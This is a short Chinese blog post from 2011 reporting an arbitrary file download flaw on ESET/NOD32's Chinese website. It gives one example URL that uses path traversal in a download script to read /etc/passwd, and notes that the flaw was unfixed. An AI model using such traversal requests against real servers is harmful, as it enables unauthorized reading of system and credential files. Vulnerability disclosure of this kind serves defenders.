nod32杀毒官方任意下载文件漏洞

作者: 日期: 2011 年 9 月 16 日 发表评论 (0) 查看评论

太蛋疼了吧,NOD32官方居然爆了个这么低级的漏洞,瞎了。。真瞎了。

例子:

http://www.eset.com.cn/api/desk/download.php?file=../../../../../../../etc/passwd

目前仍未修复,擦。

 

你可能喜欢

本文标题:nod32杀毒官方任意下载文件漏洞
本文链接:https://www.nigesb.com/nod32-website-files-download-vul.html
订阅本站:http://www.nigesb.com/feed
转载请注明来源,如果喜欢本站可以Feed订阅本站。

网络安全, ,
发表评论?

0 条评论。

发表评论


注意 - 你可以用以下 HTML tags and attributes:
<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>